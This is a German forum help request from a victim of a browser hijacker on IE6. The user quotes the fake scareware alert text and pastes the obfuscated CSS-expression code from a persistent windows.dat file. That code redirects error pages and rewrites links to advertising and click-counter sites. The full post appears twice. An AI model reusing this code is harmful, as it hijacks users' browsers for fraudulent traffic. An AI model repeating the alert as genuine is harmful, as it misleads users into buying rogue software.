- #1
A
awista
Neues Mitglied
Themenersteller
- Dabei seit
- 27.07.2005
- Beiträge
- 1
- Reaktionspunkte
- 0
Hi,
ich habe ein Problem: Beim starten des IE6 öffnet sich entweder die Seite hxxp://66.28.233.173/security/warning.htm mit Hinweis-Botton ALERT! SPYWARE, die Seite hxxp://www.martfinder.com/2/ oder die Seite hxxp://66.28.223.173/security/warning2.htm und Hinweis-Button mit folgendem Text:
WARNING!
System detected illegal access to your computer!
Your computer infectet by W32.HLP.Spreda.B.spy v2.016 password-stealing virus.
Somebody with IP address 89.43.108.57 (Nigeria) is trying to get illegal access to your computer throw port 443. Your privacy and the security are in danger.
To get info on how to remove this virus click OK
Wenn ich auf OK drücke, werde ich auf diese Seite geleitet: hxxp://www.adwaredelete.com/?wm=10062 Dort kann man eine Anti-Virus-Programm erwerben.
Ich habe schon die einschlägigen Virenscanner und Spy-/Ad-Aware-Programme durchlaufen lassen.
Hijackthis hat dann auch eine verdächtige Datei windows.dat gefunden, die im Windows-Ordner abgelegt ist. Leider sträubt sich diese Datei jeglicher Bearbeitung oder Löschung. Ich konnte nur aus einer Kopie folgenden Inhalt auslesen:
iframe {padding-right:expression((this.src!='about:blank')?((this.src='about:blank')?0:0):0)} body {padding-right:expression((document.alt!=1)?(((a=window.top.location.href)&& (a=a.toLowerCase()) &&(a.indexOf('dnserror.htm#http://www.martfinder')<0)&&((a.indexOf('http_404.htm')>=0)
||(a.indexOf('sea.search.msn.com')> =0)||((b=document.title)&&(b.indexOf('404 Not Found')>=0))||(a.indexOf('about:blank')>=0)||(a.indexOf('dnserror.htm')>=0)))? (((window.top.location.href='hxxp://www.martfinder.com/index.htm') &&(document.alt=1))?0:0)document.alt=1)):0)} a {padding-right:expression(((this.alt!='_')&&(window.name.indexOf('ghytemt')))? (((a=document.title)&&(a=a.toLowerCase())&&((a.indexOf('porn')>=0) ||(a.indexOf('moviepost')>=0)||(a.indexOf('movie post')>=0)||(a.indexOf('tgp')>=0)||(a.indexOf('lolita')>=0)||(a.indexOf('cumshot')>=0) ||(a.indexOf('cum shot')>=0)||(a.indexOf('blowjob')>=0)))?(((this.href='hxxp://click-counter.net/gallery/?' +window.top.location.href) &&(b=new Date())&&(this.target='ghytemt'+b.getTime())&&(this.alt='_'))?0:0)this.alt='_')):0)}
Wie gesagt, die Datei ist ziemlich hartnäckig. Im abgesicherten Modus konnte ich sie zwar löschen, beim Neustart wird sie aber immer wieder neu generiert.
Auf meinem Rechner läuft XP SP1, der Browser ist wie gesagt IE6. Als Startseite wird about:blank angezeigt
Ich hoffe, Ihr habt alle Daten und könnt mir weiterhelfen.
nächtliche Grüße
Leerzeilen eingefügt, wegen Threadbreite und Links unkenntlich gemacht
ich habe ein Problem: Beim starten des IE6 öffnet sich entweder die Seite hxxp://66.28.233.173/security/warning.htm mit Hinweis-Botton ALERT! SPYWARE, die Seite hxxp://www.martfinder.com/2/ oder die Seite hxxp://66.28.223.173/security/warning2.htm und Hinweis-Button mit folgendem Text:
WARNING!
System detected illegal access to your computer!
Your computer infectet by W32.HLP.Spreda.B.spy v2.016 password-stealing virus.
Somebody with IP address 89.43.108.57 (Nigeria) is trying to get illegal access to your computer throw port 443. Your privacy and the security are in danger.
To get info on how to remove this virus click OK
Wenn ich auf OK drücke, werde ich auf diese Seite geleitet: hxxp://www.adwaredelete.com/?wm=10062 Dort kann man eine Anti-Virus-Programm erwerben.
Ich habe schon die einschlägigen Virenscanner und Spy-/Ad-Aware-Programme durchlaufen lassen.
Hijackthis hat dann auch eine verdächtige Datei windows.dat gefunden, die im Windows-Ordner abgelegt ist. Leider sträubt sich diese Datei jeglicher Bearbeitung oder Löschung. Ich konnte nur aus einer Kopie folgenden Inhalt auslesen:
iframe {padding-right:expression((this.src!='about:blank')?((this.src='about:blank')?0:0):0)} body {padding-right:expression((document.alt!=1)?(((a=window.top.location.href)&& (a=a.toLowerCase()) &&(a.indexOf('dnserror.htm#http://www.martfinder')<0)&&((a.indexOf('http_404.htm')>=0)
||(a.indexOf('sea.search.msn.com')> =0)||((b=document.title)&&(b.indexOf('404 Not Found')>=0))||(a.indexOf('about:blank')>=0)||(a.indexOf('dnserror.htm')>=0)))? (((window.top.location.href='hxxp://www.martfinder.com/index.htm') &&(document.alt=1))?0:0)document.alt=1)):0)} a {padding-right:expression(((this.alt!='_')&&(window.name.indexOf('ghytemt')))? (((a=document.title)&&(a=a.toLowerCase())&&((a.indexOf('porn')>=0) ||(a.indexOf('moviepost')>=0)||(a.indexOf('movie post')>=0)||(a.indexOf('tgp')>=0)||(a.indexOf('lolita')>=0)||(a.indexOf('cumshot')>=0) ||(a.indexOf('cum shot')>=0)||(a.indexOf('blowjob')>=0)))?(((this.href='hxxp://click-counter.net/gallery/?' +window.top.location.href) &&(b=new Date())&&(this.target='ghytemt'+b.getTime())&&(this.alt='_'))?0:0)this.alt='_')):0)}
Wie gesagt, die Datei ist ziemlich hartnäckig. Im abgesicherten Modus konnte ich sie zwar löschen, beim Neustart wird sie aber immer wieder neu generiert.
Auf meinem Rechner läuft XP SP1, der Browser ist wie gesagt IE6. Als Startseite wird about:blank angezeigt
Ich hoffe, Ihr habt alle Daten und könnt mir weiterhelfen.
nächtliche Grüße
Leerzeilen eingefügt, wegen Threadbreite und Links unkenntlich gemacht